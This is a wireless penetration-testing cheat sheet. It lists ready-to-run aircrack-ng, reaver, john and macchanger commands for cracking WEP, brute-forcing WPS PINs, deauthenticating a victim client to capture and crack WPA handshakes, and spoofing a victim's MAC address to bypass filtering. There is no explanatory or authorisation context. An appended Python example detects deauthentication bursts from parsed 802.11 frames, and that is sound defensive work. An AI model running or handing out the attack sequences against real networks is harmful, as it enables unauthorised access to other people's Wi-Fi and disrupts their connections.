Wireless Penetration Testing

Enable Monitor Mode

root@mfk:~# ifconfig wlan0mon down

root@mfk:~# iwconfig wlan0mon mode monitor

root@mfk:~# ifconfig wlan0mon up

WEP Cracking

1. Fake Authentication Attack

root@mfk:~# airmon-ng start wlan0

root@mfk:~# airodump-ng -c <AP_channel> --bssid <BSSID> -w <filename> wlan0mon

Find my MAC address:

root@mfk:~# macchanger --show wlan0mon

root@mfk:~# aireplay-ng -1 0 -a <BSSID> -h <MyMac> -e <ESSID> wlan0mon

root@mfk:~# aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <BSSID> -h <MyMac> wlan0mon

root@mfk:~# aircrack-ng -b <BSSID> <filename.pcap>

2. ARP Replay Attack

root@mfk:~# airmon-ng start wlan0

root@mfk:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <filename> wlan0mon

Find my MAC address:

root@mfk:~# macchanger --show wlan0mon

root@mfk:~# aireplay-ng -3 -x 10 -n 10 -b <BSSID> -h <MyMac> wlan0mon

root@mfk:~# aircrack-ng -b <BSSID> <filename.pcap>

WPA/WPA2 Cracking

1. WPS Attack

root@mfk:~# airmon-ng start wlan0

root@mfk:~# apt-get install reaver

root@mfk:~# wash -i wlan0mon

root@mfk:~# reaver -i wlan0mon -b <BSSID> -vv -S

Or

root@mfk:~# reaver -i wlan0mon -c <channel> -b <BSSID> -p <pin> -vv -S

2. Dictionary Attack

root@mfk:~# airmon-ng start wlan0

root@mfk:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <filename> wlan0mon

root@mfk:~# aireplay-ng -0 1 -a <BSSID> -c <victim_mac> wlan0mon

root@mfk:~# aircrack-ng -w <wordlist> -b <BSSID> <handshaked.pcap>

3. John The Ripper

root@mfk:~# airmon-ng start wlan0

root@mfk:~# airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> wlan0mon

root@mfk:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon

root@mfk:~# cd /pentest/passwords/john

root@mfk:~# john --wordlist=<wordlist> --rules --stdout | aircrack-ng -0 -e <ESSID> -w - <filename.pcap>

MAC Filtering Bypass

root@mfk:~# airmon-ng start wlan0

root@mfk:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <filename> wlan0mon

root@mfk:~# aireplay-ng -0 10 -a <BSSID> -c <victim_mac> wlan0mon

root@mfk:~# ifconfig wlan0mon down

root@mfk:~# macchanger --mac <victim_mac> wlan0mon

root@mfk:~# ifconfig wlan0mon up

root@mfk:~# aireplay-ng -3 -b <BSSID> -h <fakedmac> wlan0mon
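
Seen from the defending side, the deauthentication step in the Dictionary Attack, John The Ripper and MAC filtering sections (aireplay-ng -0) appears on the air as a burst of deauthentication frames aimed at one client. The Python below is an added example, not part of the original post: it parses raw 802.11 management headers and flags such bursts. It assumes frames with the radiotap header already stripped; the MAC addresses, sample capture, window and threshold are constructed for illustration.

```python
import struct
from collections import defaultdict, deque

DEAUTH = 12  # management subtype 12 = deauthentication
BEACON = 8   # management subtype 8 = beacon

def _mac(b):
    return ":".join(f"{x:02x}" for x in b)

def parse_mgmt(frame):
    """Return (subtype, dest, src, bssid, reason) for a management frame, else None."""
    if len(frame) < 24:          # shorter than a management header: truncated or not ours
        return None
    fc = frame[0]
    if fc & 0x03 != 0 or (fc >> 2) & 0x03 != 0:  # need protocol version 0, type 0
        return None
    subtype = fc >> 4
    reason = None
    if subtype == DEAUTH and len(frame) >= 26:
        reason = struct.unpack_from("<H", frame, 24)[0]  # reason code, little endian
    return subtype, _mac(frame[4:10]), _mac(frame[10:16]), _mac(frame[16:22]), reason

def detect_deauth_bursts(capture, window=1.0, threshold=5):
    """Return sorted (bssid, target) pairs hit by >= threshold deauths within window seconds."""
    recent, flagged = defaultdict(deque), set()
    for ts, raw in capture:
        parsed = parse_mgmt(raw)
        if parsed is None or parsed[0] != DEAUTH:
            continue
        _, dest, _src, bssid, _reason = parsed
        q = recent[(bssid, dest)]
        q.append(ts)
        while ts - q[0] > window:   # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            flagged.add((bssid, dest))
    return sorted(flagged)

def _frame(subtype, dest, src, bssid, body=b""):
    """Build a constructed test frame: FC, duration, addr1-3, sequence control, body."""
    raw = lambda m: bytes.fromhex(m.replace(":", ""))
    return bytes([subtype << 4, 0, 0, 0]) + raw(dest) + raw(src) + raw(bssid) + b"\x00\x00" + body

# Constructed sample capture: one beacon, a 10-frame deauth burst, one isolated deauth.
AP, STA_A, STA_B = "02:00:00:00:00:01", "02:00:00:00:00:aa", "02:00:00:00:00:bb"
SAMPLE = [(0.0, _frame(BEACON, "ff:ff:ff:ff:ff:ff", AP, AP))]
SAMPLE += [(1.0 + i * 0.01, _frame(DEAUTH, STA_A, AP, AP, struct.pack("<H", 7))) for i in range(10)]
SAMPLE += [(9.0, _frame(DEAUTH, STA_B, AP, AP, struct.pack("<H", 3)))]

if __name__ == "__main__":
    for bssid, target in detect_deauth_bursts(SAMPLE):
        print(f"deauth burst: bssid={bssid} target={target}")
```

Because deauthentication frames are unauthenticated unless 802.11w management frame protection is enabled, the source address alone cannot separate a forged frame from a genuine one, which is why the check keys on rate per target instead.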
